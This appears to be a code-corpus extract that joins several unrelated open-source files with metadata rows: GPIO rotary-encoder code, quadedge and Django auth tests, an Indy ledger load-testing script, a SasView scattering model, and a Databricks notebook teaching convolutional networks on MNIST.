GPIO.setup(self.pinA, GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.setup(self.pinB, GPIO.IN, pull_up_down=GPIO.PUD_UP)
# add events
GPIO.add_event_detect(self.pinA, GPIO.FALLING, callback=self.switch_event)
GPIO.add_event_detect(self.pinB, GPIO.FALLING, callback=self.switch_event)
return
# Call back routine called by switch events
def switch_event(self,switch):
if GPIO.input(self.pinA):
self.rotary_a = 1
else:
self.rotary_a = 0
if GPIO.input(self.pinB):
self.rotary_b = 1
else:
self.rotary_b = 0
self.rotary_c = self.rotary_a ^ self.rotary_b
new_state = self.rotary_a * 4 + self.rotary_b * 2 + self.rotary_c * 1
delta = (new_state - self.last_state) % 4
self.last_state = new_state
event = 0
if delta == 1:
if self.direction == self.CLOCKWISE:
event = self.direction
else:
self.direction = self.CLOCKWISE
elif delta == 3:
if self.direction == self.ANTICLOCKWISE:
event = self.direction
else:
self.direction = self.ANTICLOCKWISE
if event > 0:
self.callback(event)
return
# end class RotaryEncoder
| gpl-2.0 | -9,129,966,791,251,890,000 | 21.442308 | 100 | 0.693231 | false |
jdugge/GridToTIN | test/test_quadedge.py | 1 | 1157 | import unittest
import quadedge as qe
class TestQuadedge(unittest.TestCase):
def test_quadedge(self):
q = qe.QuadEdge()
e = q.base
self.assertIs(e, q.edges[0])
self.assertIsNot(e, e.rot)
self.assertIs(e._rot, e.rot)
self.assertIs(e, e.rot.rot.rot.rot)
self.assertIs(e.rot.rot.rot, e.inv_rot)
self.assertIsNot(e, e.sym)
self.assertIs(e, e.sym.sym)
self.assertIs(e.o_next, e)
self.assertIs(e.o_prev, e)
self.assertIs(e.d_next, e)
self.assertIs(e.d_prev, e)
self.assertIs(e.l_next, e.sym)
self.assertIs(e.l_prev, e.sym)
self.assertIs(e.r_next, e.sym)
self.assertIs(e.r_prev, e.sym)
def test_splice(self):
q0 = qe.QuadEdge()
q1 = qe.QuadEdge()
e0 = q0.base
e1 = q1.base
self.assertIsNot(e0, e1)
self.assertIs(e0.o_next, e0)
qe.splice(e0, e1)
self.assertIs(e0.o_next, e1)
self.assertIs(e1.o_next, e0)
self.assertIs(e0.l_next, e0.sym)
self.assertIs(e0.l_prev, e1.sym)
if __name__ == '__main__':
unittest.main()
| mit | 4,214,614,945,183,003,000 | 21.686275 | 47 | 0.554019 | false |
spivachuk/sovrin-node | scripts/performance/perf_traffic.py | 1 | 9901 | """
Created on Feb 27, 2018
@author: nhan.nguyen
This module contains class "TesterSimulateTraffic" that simulates the real time
traffic.
"""
import threading
import random
import time
import utils
import os
import asyncio
import argparse
import requests_sender
import requests_builder
import perf_add_requests
from perf_tester import Tester
class Option:
def __init__(self):
parser = argparse.ArgumentParser(
description='Script to simulate the traffic which will send'
'request to ledger in several sets. Each set contains '
'a specified number of requests and between two set, '
'the system will be delayed for a random length of'
' time (from 1 to 10 seconds).\n\n',
usage='To create 5 client to simulate the traffic in 50 seconds '
'and you want each set contains 100 request.'
'\nuse: python3.6 perf_traffic.py -c 5 -t 50 -n 100')
parser.add_argument('-c',
help='Specify the number of clients '
'will be simulated. Default value will be 1.',
action='store',
type=int, default=1, dest='clients')
parser.add_argument('-n',
help='Number of transactions will be sent '
'in a set. Default value will be 100.',
action='store', type=int,
default=100, dest='transactions_delay')
parser.add_argument('--log',
help='To see all log. If this flag does not exist,'
'program just only print fail message',
action='store_true', default=False, dest='log')
parser.add_argument('-to',
help='Timeout of testing. '
'Default value will be 100.',
action='store', type=int,
default=100, dest='time_out')
parser.add_argument('--init',
help='To build "GET" request, we need to '
'send "ADD" request first. This argument is '
'the number of "ADD" request will be sent '
'to ledger to make sample for "GET" requests.'
' Default value will be 100',
action='store', type=int,
default=100, dest='number_of_request_samples')
self.args = parser.parse_args()
def catch_number_of_request_samples():
"""
Parse number of sample of "GET" requests will be created.
If the number is less than of equal with zero, default value (100) will be
returned.
:return: number of sample of "GET" requests.
"""
import sys
result = 100
if "--init" in sys.argv:
index = sys.argv.index("--init")
if index < len(sys.argv) - 1:
temp = -1
try:
temp = int(sys.argv[index + 1])
except ValueError:
pass
if temp > 0:
result = temp
return result
class TesterSimulateTraffic(Tester):
__sample_req_info = {}
__kinds_of_request = ["nym", "attribute", "schema", "claim",
"get_nym", "get_attribute", "get_schema",
"get_claim"]
__number_of_request_samples = catch_number_of_request_samples()
def __init__(self, number_of_clients: int = 2,
transactions_delay: int = 100,
time_out: int = 300, log=False,
seed="000000000000000000000000Trustee1"):
super().__init__(log=log, seed=seed)
utils.run_async_method(
None, TesterSimulateTraffic._prepare_samples_for_get_req,
TesterSimulateTraffic.__number_of_request_samples)
if time_out <= 0 or transactions_delay <= 0 or number_of_clients <= 0:
return
self.transactions_delay = transactions_delay
self.time_out = time_out
self.number_of_clients = number_of_clients
self.current_total_txn = 0
self.__current_time = time.time()
self.__lock = threading.Lock()
self.__sender = requests_sender.RequestsSender()
async def _test(self):
"""
Override from "Tester" class to implement testing steps.
"""
lst_threads = list()
self.__current_time = time.time()
for _ in range(self.number_of_clients):
thread = threading.Thread(target=self.__simulate_client)
thread.setDaemon(True)
thread.start()
lst_threads.append(thread)
for thread in lst_threads:
thread.join(self.time_out * 1.1)
self.passed_req = self.__sender.passed_req
self.failed_req = self.__sender.failed_req
self.fastest_txn = self.__sender.fastest_txn
self.lowest_txn = self.__sender.lowest_txn
def __update(self):
"""
Synchronize within threads to update some necessary information.
"""
self.__lock.acquire()
if self.start_time == 0 and self.finish_time != 0:
self.start_time = self.finish_time
if self.current_total_txn != 0 and \
self.current_total_txn % self.transactions_delay == 0:
time.sleep(random.randint(1, 10))
self.current_total_txn += 1
self.__lock.release()
def __simulate_client(self):
"""
Simulate a client to create real time traffic.
"""
loop = asyncio.new_event_loop()
args = {"wallet_handle": self.wallet_handle,
"pool_handle": self.pool_handle,
"submitter_did": self.submitter_did}
asyncio.set_event_loop(loop)
while True:
self.__update()
if time.time() - self.__current_time >= self.time_out:
break
self.finish_time = utils.run_async_method(
loop, TesterSimulateTraffic._build_and_send_request,
self.__sender, args)
loop.close()
@staticmethod
async def generate_sample_request_info(kind,
sample_num: int = 100) -> list:
"""
Generate sample request information.
:param kind: kind of request.
:param sample_num: number of samples will be generated.
:return: a list of samples request information.
"""
kinds = ["nym", "schema", "attribute", "claim"]
if kind not in kinds or sample_num <= 0:
return []
generator = perf_add_requests.PerformanceTesterForAddingRequest(
request_num=sample_num, request_kind=kind)
await generator.test()
lst_info = list()
with open(generator.info_file_path, "r") as info_file:
for line in info_file:
if len(line) > 2:
lst_info.append(line)
try:
os.remove(generator.info_file_path)
except IOError:
pass
return lst_info
@staticmethod
async def _prepare_samples_for_get_req(sample_num: int = 100):
"""
Init samples for "GET" requests.
:param sample_num: create a number of samples request information for
each kind of request (nym, attribute, claim, schema)
"""
if TesterSimulateTraffic.__sample_req_info:
return
keys = ["nym", "attribute", "schema", "claim"]
if sample_num <= 0:
return
for key in keys:
TesterSimulateTraffic.__sample_req_info[key] = \
await TesterSimulateTraffic.generate_sample_request_info(
key, sample_num)
@staticmethod
def _random_req_kind():
"""
Random choice a request kind.
:return: request kind.
"""
return random.choice(TesterSimulateTraffic.__kinds_of_request)
@staticmethod
def _random_sample_for_get_request(kind: str):
"""
Choice randomly a sample of request info base on kind of request.
:param kind: kind of request (get_nym, get_attribute,
get_claim, get_schema).
:return: a random sample of request info.
"""
if kind.startswith("get_"):
return random.choice(
TesterSimulateTraffic.__sample_req_info[kind.replace(
"get_", "")])
return ""
@staticmethod
async def _build_and_send_request(sender, args):
"""
Build a request and send it onto ledger.
:param sender: send the request.
:param args: contains some arguments to send request to ledger
(pool handle, wallet handle, submitter did)
:return: response time.
"""
kind = TesterSimulateTraffic._random_req_kind()
data = TesterSimulateTraffic._random_sample_for_get_request(kind)
req = await requests_builder.RequestBuilder.build_request(args, kind,
data)
return await sender.send_request(args, kind, req)
if __name__ == '__main__':
opts = Option().args
tester = TesterSimulateTraffic(number_of_clients=opts.clients,
transactions_delay=opts.transactions_delay,
time_out=opts.time_out, log=opts.log)
utils.run_async_method(None, tester.test)
elapsed_time = tester.finish_time - tester.start_time
utils.print_client_result(tester.passed_req, tester.failed_req,
elapsed_time)
| apache-2.0 | 5,081,833,395,924,299,000 | 33.378472 | 79 | 0.54045 | false |
SasView/sasmodels | sasmodels/models/fcc_paracrystal.py | 1 | 6252 | #fcc paracrystal model
#note model title and parameter table are automatically inserted
#note - calculation requires double precision
r"""
.. warning:: This model and this model description are under review following
concerns raised by SasView users. If you need to use this model,
please email [email protected] for the latest situation. *The
SasView Developers. September 2018.*
Definition
----------
Calculates the scattering from a **face-centered cubic lattice** with
paracrystalline distortion. Thermal vibrations are considered to be
negligible, and the size of the paracrystal is infinitely large.
Paracrystalline distortion is assumed to be isotropic and characterized by
a Gaussian distribution.
The scattering intensity $I(q)$ is calculated as
.. math::
I(q) = \frac{\text{scale}}{V_p} V_\text{lattice} P(q) Z(q)
where *scale* is the volume fraction of spheres, $V_p$ is the volume of
the primary particle, $V_\text{lattice}$ is a volume correction for the crystal
structure, $P(q)$ is the form factor of the sphere (normalized), and $Z(q)$
is the paracrystalline structure factor for a face-centered cubic structure.
Equation (1) of the 1990 reference\ [#Matsuoka1990]_ is used to calculate
$Z(q)$, using equations (23)-(25) from the 1987 paper\ [#Matsuoka1987]_ for
$Z1$, $Z2$, and $Z3$.
The lattice correction (the occupied volume of the lattice) for a
face-centered cubic structure of particles of radius $R$ and nearest
neighbor separation $D$ is
.. math::
V_\text{lattice} = \frac{16\pi}{3}\frac{R^3}{\left(D\sqrt{2}\right)^3}
The distortion factor (one standard deviation) of the paracrystal is
included in the calculation of $Z(q)$
.. math::
\Delta a = gD
where $g$ is a fractional distortion based on the nearest neighbor distance.
.. figure:: img/fcc_geometry.jpg
Face-centered cubic lattice.
For a crystal, diffraction peaks appear at reduced q-values given by
.. math::
\frac{qD}{2\pi} = \sqrt{h^2 + k^2 + l^2}
where for a face-centered cubic lattice $h, k , l$ all odd or all
even are allowed and reflections where $h, k, l$ are mixed odd/even
are forbidden. Thus the peak positions correspond to (just the first 5)
.. math::
\begin{array}{cccccc}
q/q_0 & 1 & \sqrt{4/3} & \sqrt{8/3} & \sqrt{11/3} & \sqrt{4} \\
\text{Indices} & (111) & (200) & (220) & (311) & (222)
\end{array}
.. note::
The calculation of $Z(q)$ is a double numerical integral that must be
carried out with a high density of points to properly capture the sharp
peaks of the paracrystalline scattering. So be warned that the calculation
is slow. Fitting of any experimental data must be resolution smeared for
any meaningful fit. This makes a triple integral which may be very slow.
The 2D (Anisotropic model) is based on the reference below where $I(q)$ is
approximated for 1d scattering. Thus the scattering pattern for 2D may not
be accurate particularly at low $q$. For general details of the calculation
and angular dispersions for oriented particles see :ref:`orientation`.
Note that we are not responsible for any incorrectness of the
2D model computation.
.. figure:: img/parallelepiped_angle_definition.png
Orientation of the crystal with respect to the scattering plane, when
$\theta = \phi = 0$ the $c$ axis is along the beam direction (the $z$ axis).
References
----------
.. [#Matsuoka1987] Hideki Matsuoka et. al. *Physical Review B*, 36 (1987)
1754-1765 (Original Paper)
.. [#Matsuoka1990] Hideki Matsuoka et. al. *Physical Review B*, 41 (1990)
3854-3856 (Corrections to FCC and BCC lattice structure calculation)
Authorship and Verification
---------------------------
* **Author:** NIST IGOR/DANSE **Date:** pre 2010
* **Last Modified by:** Paul Butler **Date:** September 29, 2016
* **Last Reviewed by:** Richard Heenan **Date:** March 21, 2016
"""
import numpy as np
from numpy import inf, pi
name = "fcc_paracrystal"
title = "Face-centred cubic lattic with paracrystalline distortion"
description = """
Calculates the scattering from a **face-centered cubic lattice** with
paracrystalline distortion. Thermal vibrations are considered to be
negligible, and the size of the paracrystal is infinitely large.
Paracrystalline distortion is assumed to be isotropic and characterized
by a Gaussian distribution.
"""
category = "shape:paracrystal"
single = False
# pylint: disable=bad-whitespace, line-too-long
# ["name", "units", default, [lower, upper], "type","description"],
parameters = [["dnn", "Ang", 220, [-inf, inf], "", "Nearest neighbour distance"],
["d_factor", "", 0.06, [-inf, inf], "", "Paracrystal distortion factor"],
["radius", "Ang", 40, [0, inf], "volume", "Particle radius"],
["sld", "1e-6/Ang^2", 4, [-inf, inf], "sld", "Particle scattering length density"],
["sld_solvent", "1e-6/Ang^2", 1, [-inf, inf], "sld", "Solvent scattering length density"],
["theta", "degrees", 60, [-360, 360], "orientation", "c axis to beam angle"],
["phi", "degrees", 60, [-360, 360], "orientation", "rotation about beam"],
["psi", "degrees", 60, [-360, 360], "orientation", "rotation about c axis"]
]
# pylint: enable=bad-whitespace, line-too-long
source = ["lib/sas_3j1x_x.c", "lib/gauss150.c", "lib/sphere_form.c", "fcc_paracrystal.c"]
def random():
"""Return a random parameter set for the model."""
# copied from bcc_paracrystal
radius = 10**np.random.uniform(1.3, 4)
d_factor = 10**np.random.uniform(-2, -0.7) # sigma_d in 0.01-0.7
dnn_fraction = np.random.beta(a=10, b=1)
dnn = radius*4/np.sqrt(2)/dnn_fraction
pars = dict(
#sld=1, sld_solvent=0, scale=1, background=1e-32,
dnn=dnn,
d_factor=d_factor,
radius=radius,
)
return pars
# april 10 2017, rkh add unit tests, NOT compared with any other calc method, assume correct!
# TODO: fix the 2d tests
q = 4.*pi/220.
tests = [
[{}, [0.001, q, 0.215268], [0.275164706668, 5.7776842567, 0.00958167119232]],
#[{}, (-0.047, -0.007), 238.103096286],
#[{}, (0.053, 0.063), 0.863609587796],
]
| bsd-3-clause | -7,846,327,260,319,252,000 | 37.832298 | 104 | 0.671465 | false |
motherjones/mirrors | mirrors/tests/test_auth.py | 1 | 1445 | from django.core.urlresolvers import reverse
from rest_framework import status
from rest_framework.test import APITestCase
class ComponentAuthenticationTest(APITestCase):
fixtures = ['users.json', 'component_data.json']
def test_noauthed_rejects(self):
url = reverse('component-detail', kwargs={
'slug': 'component-with-svg-data'
})
res = self.client.get(url)
self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)
def test_authed_as_user_accepts(self):
url = reverse('component-detail', kwargs={
'slug': 'component-with-svg-data'
})
self.client.login(username='test_user', password='password1')
res = self.client.get(url)
self.assertEqual(res.status_code, status.HTTP_200_OK)
def test_authed_as_staff_accepts(self):
url = reverse('component-detail', kwargs={
'slug': 'component-with-svg-data'
})
self.client.login(username='test_staff', password='password1')
res = self.client.get(url)
self.assertEqual(res.status_code, status.HTTP_200_OK)
def test_authed_as_admin_accepts(self):
url = reverse('component-detail', kwargs={
'slug': 'component-with-svg-data'
})
self.client.login(username='test_admin', password='password1')
res = self.client.get(url)
self.assertEqual(res.status_code, status.HTTP_200_OK)
| mit | 7,669,851,948,419,885,000 | 32.604651 | 71 | 0.640138 | false |
lamastex/scalable-data-science | dbcArchives/2021/000_6-sds-3-x-dl/055_DLbyABr_04-ConvolutionalNetworks.py | 1 | 22551 | # Databricks notebook source
# MAGIC %md
# MAGIC ScaDaMaLe Course [site](https://lamastex.github.io/scalable-data-science/sds/3/x/) and [book](https://lamastex.github.io/ScaDaMaLe/index.html)
# MAGIC
# MAGIC This is a 2019-2021 augmentation and update of [Adam Breindel](https://www.linkedin.com/in/adbreind)'s initial notebooks.
# MAGIC
# MAGIC _Thanks to [Christian von Koch](https://www.linkedin.com/in/christianvonkoch/) and [William Anzén](https://www.linkedin.com/in/william-anz%C3%A9n-b52003199/) for their contributions towards making these materials Spark 3.0.1 and Python 3+ compliant._
# COMMAND ----------
# MAGIC %md
# MAGIC # Convolutional Neural Networks
# MAGIC ## aka CNN, ConvNet
# COMMAND ----------
# MAGIC %md
# MAGIC As a baseline, let's start a lab running with what we already know.
# MAGIC
# MAGIC We'll take our deep feed-forward multilayer perceptron network, with ReLU activations and reasonable initializations, and apply it to learning the MNIST digits.
# MAGIC
# MAGIC The main part of the code looks like the following (full code you can run is in the next cell):
# MAGIC
# MAGIC ```
# MAGIC # imports, setup, load data sets
# MAGIC
# MAGIC model = Sequential()
# MAGIC model.add(Dense(20, input_dim=784, kernel_initializer='normal', activation='relu'))
# MAGIC model.add(Dense(15, kernel_initializer='normal', activation='relu'))
# MAGIC model.add(Dense(10, kernel_initializer='normal', activation='softmax'))
# MAGIC model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['categorical_accuracy'])
# MAGIC
# MAGIC categorical_labels = to_categorical(y_train, num_classes=10)
# MAGIC
# MAGIC history = model.fit(X_train, categorical_labels, epochs=100, batch_size=100)
# MAGIC
# MAGIC # print metrics, plot errors
# MAGIC ```
# MAGIC
# MAGIC Note the changes, which are largely about building a classifier instead of a regression model:
# MAGIC * Output layer has one neuron per category, with softmax activation
# MAGIC * __Loss function is cross-entropy loss__
# MAGIC * Accuracy metric is categorical accuracy
# COMMAND ----------
# MAGIC %md
# MAGIC Let's hold pointers into wikipedia for these new concepts.
# COMMAND ----------
# MAGIC %scala
# MAGIC //This allows easy embedding of publicly available information into any other notebook
# MAGIC //Example usage:
# MAGIC // displayHTML(frameIt("https://en.wikipedia.org/wiki/Latent_Dirichlet_allocation#Topics_in_LDA",250))
# MAGIC def frameIt( u:String, h:Int ) : String = {
# MAGIC """<iframe
# MAGIC src=""""+ u+""""
# MAGIC width="95%" height="""" + h + """"
# MAGIC sandbox>
# MAGIC <p>
# MAGIC <a href="http://spark.apache.org/docs/latest/index.html">
# MAGIC Fallback link for browsers that, unlikely, don't support frames
# MAGIC </a>
# MAGIC </p>
# MAGIC </iframe>"""
# MAGIC }
# MAGIC displayHTML(frameIt("https://en.wikipedia.org/wiki/Cross_entropy#Cross-entropy_error_function_and_logistic_regression",500))
# COMMAND ----------
# MAGIC %scala
# MAGIC displayHTML(frameIt("https://en.wikipedia.org/wiki/Softmax_function",380))
# COMMAND ----------
# MAGIC %md
# MAGIC The following is from: [https://www.quora.com/How-does-Keras-calculate-accuracy](https://www.quora.com/How-does-Keras-calculate-accuracy).
# MAGIC
# MAGIC **Categorical accuracy:**
# MAGIC
# MAGIC ```%python
# MAGIC def categorical_accuracy(y_true, y_pred):
# MAGIC return K.cast(K.equal(K.argmax(y_true, axis=-1),
# MAGIC K.argmax(y_pred, axis=-1)),
# MAGIC K.floatx())
# MAGIC ```
# MAGIC
# MAGIC > `K.argmax(y_true)` takes the highest value to be the prediction and matches against the comparative set.
# COMMAND ----------
# MAGIC %md
# MAGIC Watch (1:39)
# MAGIC * [](https://www.youtube.com/watch?v=tRsSi_sqXjI)
# MAGIC
# MAGIC Watch (1:54)
# MAGIC * [](https://www.youtube.com/watch?v=x449QQDhMDE)
# COMMAND ----------
from keras.models import Sequential
from keras.layers import Dense
from keras.utils import to_categorical
import sklearn.datasets
import datetime
import matplotlib.pyplot as plt
import numpy as np
train_libsvm = "/dbfs/databricks-datasets/mnist-digits/data-001/mnist-digits-train.txt"
test_libsvm = "/dbfs/databricks-datasets/mnist-digits/data-001/mnist-digits-test.txt"
X_train, y_train = sklearn.datasets.load_svmlight_file(train_libsvm, n_features=784)
X_train = X_train.toarray()
X_test, y_test = sklearn.datasets.load_svmlight_file(test_libsvm, n_features=784)
X_test = X_test.toarray()
model = Sequential()
model.add(Dense(20, input_dim=784, kernel_initializer='normal', activation='relu'))
model.add(Dense(15, kernel_initializer='normal', activation='relu'))
model.add(Dense(10, kernel_initializer='normal', activation='softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['categorical_accuracy'])
categorical_labels = to_categorical(y_train, num_classes=10)
start = datetime.datetime.today()
history = model.fit(X_train, categorical_labels, epochs=40, batch_size=100, validation_split=0.1, verbose=2)
scores = model.evaluate(X_test, to_categorical(y_test, num_classes=10))
print
for i in range(len(model.metrics_names)):
print("%s: %f" % (model.metrics_names[i], scores[i]))
print ("Start: " + str(start))
end = datetime.datetime.today()
print ("End: " + str(end))
print ("Elapse: " + str(end-start))
# COMMAND ----------
# MAGIC %md
# MAGIC after about a minute we have:
# MAGIC
# MAGIC ```
# MAGIC ...
# MAGIC
# MAGIC Epoch 40/40
# MAGIC 1s - loss: 0.0610 - categorical_accuracy: 0.9809 - val_loss: 0.1918 - val_categorical_accuracy: 0.9583
# MAGIC
# MAGIC ...
# MAGIC
# MAGIC loss: 0.216120
# MAGIC
# MAGIC categorical_accuracy: 0.955000
# MAGIC
# MAGIC Start: 2017-12-06 07:35:33.948102
# MAGIC
# MAGIC End: 2017-12-06 07:36:27.046130
# MAGIC
# MAGIC Elapse: 0:00:53.098028
# MAGIC ```
# COMMAND ----------
import matplotlib.pyplot as plt
fig, ax = plt.subplots()
fig.set_size_inches((5,5))
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['train', 'val'], loc='upper left')
display(fig)
# COMMAND ----------
# MAGIC %md
# MAGIC What are the big takeaways from this experiment?
# MAGIC
# MAGIC 1. We get pretty impressive "apparent error" accuracy right from the start! A small network gets us to training accuracy 97% by epoch 20
# MAGIC 2. The model *appears* to continue to learn if we let it run, although it does slow down and oscillate a bit.
# MAGIC 3. Our test accuracy is about 95% after 5 epochs and never gets better ... it gets worse!
# MAGIC 4. Therefore, we are overfitting very quickly... most of the "training" turns out to be a waste.
# MAGIC 5. For what it's worth, we get 95% accuracy without much work.
# MAGIC
# MAGIC This is not terrible compared to other, non-neural-network approaches to the problem. After all, we could probably tweak this a bit and do even better.
# MAGIC
# MAGIC But we talked about using deep learning to solve "95%" problems or "98%" problems ... where one error in 20, or 50 simply won't work. If we can get to "multiple nines" of accuracy, then we can do things like automate mail sorting and translation, create cars that react properly (all the time) to street signs, and control systems for robots or drones that function autonomously.
# MAGIC
# MAGIC Try two more experiments (try them separately):
# MAGIC 1. Add a third, hidden layer.
# MAGIC 2. Increase the size of the hidden layers.
# MAGIC
# MAGIC Adding another layer slows things down a little (why?) but doesn't seem to make a difference in accuracy.
# MAGIC
# MAGIC Adding a lot more neurons into the first topology slows things down significantly -- 10x as many neurons, and only a marginal increase in accuracy. Notice also (in the plot) that the learning clearly degrades after epoch 50 or so.
# MAGIC
# MAGIC ... We need a new approach!
# MAGIC
# MAGIC ---
# MAGIC
# MAGIC ... let's think about this:
# MAGIC
# MAGIC ### What is layer 2 learning from layer 1? Combinations of pixels
# MAGIC
# MAGIC #### Combinations of pixels contain information but...
# MAGIC
# MAGIC There are a lot of them (combinations) and they are "fragile"
# MAGIC
# MAGIC In fact, in our last experiment, we basically built a model that memorizes a bunch of "magic" pixel combinations.
# MAGIC
# MAGIC What might be a better way to build features?
# MAGIC
# MAGIC * When humans perform this task, we look not at arbitrary pixel combinations, but certain geometric patterns -- lines, curves, loops.
# MAGIC * These features are made up of combinations of pixels, but they are far from arbitrary
# MAGIC * We identify these features regardless of translation, rotation, etc.
# MAGIC
# MAGIC Is there a way to get the network to do the same thing?
# MAGIC
# MAGIC I.e., in layer one, identify pixels. Then in layer 2+, identify abstractions over pixels that are translation-invariant 2-D shapes?
# MAGIC
# MAGIC We could look at where a "filter" that represents one of these features (e.g., and edge) matches the image.
# MAGIC
# MAGIC How would this work?
# MAGIC
# MAGIC ### Convolution
# MAGIC
# MAGIC Convolution in the general mathematical sense is define as follows:
# MAGIC
# MAGIC <img src="https://i.imgur.com/lurC2Cx.png" width=300>
# MAGIC
# MAGIC The convolution we deal with in deep learning is a simplified case. We want to compare two signals. Here are two visualizations, courtesy of Wikipedia, that help communicate how convolution emphasizes features:
# MAGIC
# MAGIC <img src="http://i.imgur.com/EDCaMl2.png" width=500>
# MAGIC
# MAGIC ---
# MAGIC
# MAGIC #### Here's an animation (where we change \\({\tau}\\))
# MAGIC <img src="http://i.imgur.com/0BFcnaw.gif">
# MAGIC
# MAGIC __In one sense, the convolution captures and quantifies the pattern matching over space__
# MAGIC
# MAGIC If we perform this in two dimensions, we can achieve effects like highlighting edges:
# MAGIC
# MAGIC <img src="http://i.imgur.com/DKEXIII.png">
# MAGIC
# MAGIC The matrix here, also called a convolution kernel, is one of the functions we are convolving. Other convolution kernels can blur, "sharpen," etc.
# MAGIC
# MAGIC ### So we'll drop in a number of convolution kernels, and the network will learn where to use them? Nope. Better than that.
# MAGIC
# MAGIC ## We'll program in the *idea* of discrete convolution, and the network will learn what kernels extract meaningful features!
# MAGIC
# MAGIC The values in a (fixed-size) convolution kernel matrix will be variables in our deep learning model. Although inuitively it seems like it would be hard to learn useful params, in fact, since those variables are used repeatedly across the image data, it "focuses" the error on a smallish number of parameters with a lot of influence -- so it should be vastly *less* expensive to train than just a huge fully connected layer like we discussed above.
# MAGIC
# MAGIC This idea was developed in the late 1980s, and by 1989, Yann LeCun (at AT&T/Bell Labs) had built a practical high-accuracy system (used in the 1990s for processing handwritten checks and mail).
# MAGIC
# MAGIC __How do we hook this into our neural networks?__
# MAGIC
# MAGIC * First, we can preserve the geometric properties of our data by "shaping" the vectors as 2D instead of 1D.
# MAGIC
# MAGIC * Then we'll create a layer whose value is not just activation applied to weighted sum of inputs, but instead it's the result of a dot-product (element-wise multiply and sum) between the kernel and a patch of the input vector (image).
# MAGIC * This value will be our "pre-activation" and optionally feed into an activation function (or "detector")
# MAGIC
# MAGIC <img src="http://i.imgur.com/ECyi9lL.png">
# MAGIC
# MAGIC
# MAGIC If we perform this operation at lots of positions over the image, we'll get lots of outputs, as many as one for every input pixel.
# MAGIC
# MAGIC
# MAGIC <img src="http://i.imgur.com/WhOrJ0Y.jpg">
# MAGIC
# MAGIC * So we'll add another layer that "picks" the highest convolution pattern match from nearby pixels, which
# MAGIC * makes our pattern match a little bit translation invariant (a fuzzy location match)
# MAGIC * reduces the number of outputs significantly
# MAGIC * This layer is commonly called a pooling layer, and if we pick the "maximum match" then it's a "max pooling" layer.
# MAGIC
# MAGIC <img src="http://i.imgur.com/9iPpfpb.png">
# MAGIC
# MAGIC __The end result is that the kernel or filter together with max pooling creates a value in a subsequent layer which represents the appearance of a pattern in a local area in a prior layer.__
# MAGIC
# MAGIC __Again, the network will be given a number of "slots" for these filters and will learn (by minimizing error) what filter values produce meaningful features. This is the key insight into how modern image-recognition networks are able to generalize -- i.e., learn to tell 6s from 7s or cats from dogs.__
# MAGIC
# MAGIC <img src="http://i.imgur.com/F8eH3vj.png">
# MAGIC
# MAGIC ## Ok, let's build our first ConvNet:
# MAGIC
# MAGIC First, we want to explicity shape our data into a 2-D configuration. We'll end up with a 4-D tensor where the first dimension is the training examples, then each example is 28x28 pixels, and we'll explicitly say it's 1-layer deep. (Why? with color images, we typically process over 3 or 4 channels in this last dimension)
# MAGIC
# MAGIC A step by step animation follows:
# MAGIC * http://cs231n.github.io/assets/conv-demo/index.html
# COMMAND ----------
train_libsvm = "/dbfs/databricks-datasets/mnist-digits/data-001/mnist-digits-train.txt"
test_libsvm = "/dbfs/databricks-datasets/mnist-digits/data-001/mnist-digits-test.txt"
X_train, y_train = sklearn.datasets.load_svmlight_file(train_libsvm, n_features=784)
X_train = X_train.toarray()
X_test, y_test = sklearn.datasets.load_svmlight_file(test_libsvm, n_features=784)
X_test = X_test.toarray()
X_train = X_train.reshape( (X_train.shape[0], 28, 28, 1) )
X_train = X_train.astype('float32')
X_train /= 255
y_train = to_categorical(y_train, num_classes=10)
X_test = X_test.reshape( (X_test.shape[0], 28, 28, 1) )
X_test = X_test.astype('float32')
X_test /= 255
y_test = to_categorical(y_test, num_classes=10)
# COMMAND ----------
# MAGIC %md
# MAGIC Now the model:
# COMMAND ----------
from keras.layers import Dense, Dropout, Activation, Flatten, Conv2D, MaxPooling2D
model = Sequential()
model.add(Conv2D(8, # number of kernels
(4, 4), # kernel size
padding='valid', # no padding; output will be smaller than input
input_shape=(28, 28, 1)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2,2)))
model.add(Flatten())
model.add(Dense(128))
model.add(Activation('relu')) # alternative syntax for applying activation
model.add(Dense(10))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
# COMMAND ----------
# MAGIC %md
# MAGIC ... and the training loop and output:
# COMMAND ----------
start = datetime.datetime.today()
history = model.fit(X_train, y_train, batch_size=128, epochs=8, verbose=2, validation_split=0.1)
scores = model.evaluate(X_test, y_test, verbose=1)
print
for i in range(len(model.metrics_names)):
print("%s: %f" % (model.metrics_names[i], scores[i]))
# COMMAND ----------
fig, ax = plt.subplots()
fig.set_size_inches((5,5))
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['train', 'val'], loc='upper left')
display(fig)
# COMMAND ----------
# MAGIC %md
# MAGIC ### Our MNIST ConvNet
# MAGIC
# MAGIC In our first convolutional MNIST experiment, we get to almost 99% validation accuracy in just a few epochs (a minutes or so on CPU)!
# MAGIC
# MAGIC The training accuracy is effectively 100%, though, so we've almost completely overfit (i.e., memorized the training data) by this point and need to do a little work if we want to keep learning.
# MAGIC
# MAGIC Let's add another convolutional layer:
# COMMAND ----------
model = Sequential()
model.add(Conv2D(8, # number of kernels
(4, 4), # kernel size
padding='valid',
input_shape=(28, 28, 1)))
model.add(Activation('relu'))
model.add(Conv2D(8, (4, 4)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2,2)))
model.add(Flatten())
model.add(Dense(128))
model.add(Activation('relu'))
model.add(Dense(10))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
history = model.fit(X_train, y_train, batch_size=128, epochs=15, verbose=2, validation_split=0.1)
scores = model.evaluate(X_test, y_test, verbose=1)
print
for i in range(len(model.metrics_names)):
print("%s: %f" % (model.metrics_names[i], scores[i]))
# COMMAND ----------
# MAGIC %md
# MAGIC While that's running, let's look at a number of "famous" convolutional networks!
# MAGIC
# MAGIC ### LeNet (Yann LeCun, 1998)
# MAGIC
